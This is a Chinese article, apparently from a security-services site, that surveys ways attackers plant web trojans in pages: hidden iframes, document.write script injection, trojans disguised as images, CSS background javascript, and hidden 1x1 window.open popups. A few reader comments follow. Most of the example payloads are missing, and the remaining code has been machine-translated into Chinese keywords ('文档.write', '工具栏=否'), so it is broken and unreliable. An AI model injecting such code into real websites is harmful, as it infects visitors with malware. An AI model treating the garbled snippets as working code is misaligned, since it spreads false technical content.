大家好,今天来为大家解答我们来看看网页常见的挂马方式这个问题的一些问题点,包括也一样很多人还不知道,因此呢,今天就来为大家分析分析,现在让我们一起来看看吧!如果解决了您的问题,还望您关注下本站哦,谢谢~
(1)iframe框架挂马
在网页中添加一行挂马程序,例如:
这种嵌入很常见。当您在Google上搜索时,您可能会发现带有木马的网页,这些网页通常通过这种方式链接到木马。这行语句是在打开网页的同时打开另一个网页。当然,这个网页可能含有大量木马,也可能只是为了骗取流量。
如果我们的网页没有使用iframe,我们可以屏蔽iframe属性。这样,即使网页被iframe挂了,也不会伤害到访问网站的用户。
【原则】:
IE5及以后版本支持在CSS中使用表达式将CSS属性与JavaScript脚本关联起来。这里的CSS属性可以是元素固有的属性,也可以是自定义的属性。
我们可以通过在网页中添加以下代码来屏蔽iframe属性:
iframe{a:表达式(this.src=’about:blank’,this.outerHTML=”);}
iframe也可以通过加密的方式挂载,如以下代码:
(2)脚本挂马
通过脚本的调用来挂马,可以直接html文件挂马,也可以挂js文件,也可以纯文本挂马。为了避免追查,还有加密挂马的形式。形式各异,差异很大。主要方法如下:
这是一个加密的木马语句;
2.1 htm文件挂载:
通过上传木马文件(x.htm)挂马,代码如下:
文档.write(“
”)
文档.write(“”)
文档.write(“”)
htm木马代码:
2.2 js文件挂起
通过上传木马文件(x.js)挂马,代码如下:
文档.write(“”);
JS马码:
当然,你也可以挂网上任意机器的x.js文件;
2.3 js变形加密
(三)伪装成马的图片
随着防病毒技术的发展,图像木马技术是一种逃避防病毒监控的新技术。攻击者会将类似:http://www.xxx.com/x.htm的木马代码植入x.gif图像文本中
在文件中,可以使用工具生成这些嵌入代码的图像。图片木马生成后,通过代码调用的方式执行。这是一种比较新的隐藏木马木马的方法。示例代码如下:
当用户打开http://www.x.com/x.htm时,会向用户显示http://www.x.com/x.jpg,并且http://www.x.com/x.htm网页代码也会相应运行。
(4)其他挂马方法
4.1身挂马
您还可以将马添加到css 主体中
身体{
背景-image: url(‘javascript:document.write(“”)’)}
4.2 隐马骑乘
顶部.文档.body.innerHTML=顶部.文档.body.innerHTML +
‘ ‘;
4.3 Java的open函数挂起
直接致电:
window.open(“x.htm”,“”,“工具栏=否,位置=否,目录=否,状态=否,菜单栏=否,滚动条=否,宽度=1,高度=1”);
欺骗电话:
页面要显示的内容
函数www_a_com ()
{
var url=”网马地址”;
打开(url,“新窗口”,“工具栏=否,位置=否,目录=否,状态=否,菜单栏=否,滚动条=否,可调整大小=否,复制历史记录=是,w
idth=800,height=600,left=10,top=10);
}
4.4 伪装呼叫:
各类网页木马的代码都非常简单。因此,网络木马想要传播,就会不断地开发出新的木马方法,并且不断地对自己进行加密和隐藏,这样才能逃过各种安全软件的法眼。其实看上面的内容,很多语句都是编程中常用的代码,只不过用途不同而已。了解了网页恶意软件的原理和方法,防范网页恶意软件就会容易很多。
原创文章,作者:小su,如若转载,请注明出处:https://www.sudun.com/ask/172810.html
用户评论
命里缺他
这篇文章讲解得真棒!我以前只是觉得网站突然变 slow 就怪浏览器了,没想到是因为挂马。这下明白了,以后一定要注意哪些地方容易被挂马,保护好自己和朋友电脑安全。
有9位网友表示赞同!
鹿叹
确实常常会遇到网页加载缓慢或者出现奇怪的弹窗,以为是网络问题,但原来可能是中了马!看完这篇文章后,对于网站安全性要更重视了。还是要多了解一些防范知识才好。
有12位网友表示赞同!
水波映月
我曾经亲身经历过被网页挂马的事情,真是令人头疼!我的电脑突然运行很缓慢,而且还会弹出各种骚扰广告。幸好及时发现并清理,要不然后果不堪设想。
有12位网友表示赞同!
呆檬
我一直以为网站挂马的危害不大,直到看了这篇文章才知道原来很多恶意软件都通过网页来传播。这篇分析的很到位,让我们对常见的网页挂马方式有了更清晰的了解。
有8位网友表示赞同!
繁华若梦
这篇文章提醒我时刻保持警惕,任何不可信的网页不点进入!要多注意网站安全性,选择正规且可靠的平台使用。
有14位网友表示赞同!
玻璃渣子
说的真不错,很多人都被假冒的知名网站骗了信任然后中了病毒。建议大家下载软件时一定要去官网下载,切勿从不知名的网站下载,以免上当受骗。
有10位网友表示赞同!
有恃无恐
我之前遇到过一次这种情况,打开一家电商网站购买物品的时候,页面跳转到一个很奇怪的页面,后来才知道被挂马了!幸好没有输入任何个人信息。
有17位网友表示赞同!
等量代换
很多时候我们对网页安全性放松警惕,只要页面看起来正常,就认为安全无虞,其实这种想法是错误的。我们要增强安全意识,了解常见的网页挂马方式,才能更好地保护自己。
有16位网友表示赞同!
あ浅浅の嘚僾
文章的内容简单易懂,很适合普通用户了解常见网页挂马方式。希望大家都能看完这篇文章后提高自己的安全意识,避免上当受骗。
有11位网友表示赞同!
此生一诺
有些网页挂马方法确实让人难以察觉,需要我们时刻保持警惕!建议大家浏览网上的信息时,要注意观察网站真实性和安全性,可选择 reputable 的网站
有7位网友表示赞同!
虚伪了的真心
我倒是觉得这篇文章有点太过危言耸听,大部分的用户还是很有安全意识的。 不要无端的恐惧网页安全问题,还是要理性面对风险。
有18位网友表示赞同!
强辩
说得真对!现在网络诈骗手段越来越先进,我们确实需要加强防范意识。这篇文章让我明白很多时候看似正常的网页也可能是存在危险的,要时刻保持警惕才能不被骗局所困!
有11位网友表示赞同!
铁树不曾开花
我感觉这种分析方式过于片面,并没有提到一些比较常见的漏洞攻陷方法。文章重点太窄了,需要更加全面地介绍各种网站安全风险。
有12位网友表示赞同!
灼痛
虽然这篇文章解释了网页挂马的方式,但没有给出具体的防范策略。我认为应该结合实际情况,提供更详细的防护建议,例如使用哪些软件、设置什么样的防火墙等等!
有15位网友表示赞同!
酒笙倾凉
我觉得这种类型的文章还是很有必要存在的,很多用户不了解这些知识,很容易上当受骗。希望能够定期更新相关资讯,及时提醒大家注意安全!
有10位网友表示赞同!
大王派我来巡山!
这篇文章虽然比较简单,但对我的理解提高了一点。我以后会更加仔细地识别网页,避免点击那些可疑的链接,保护自己的信息安全!
有15位网友表示赞同!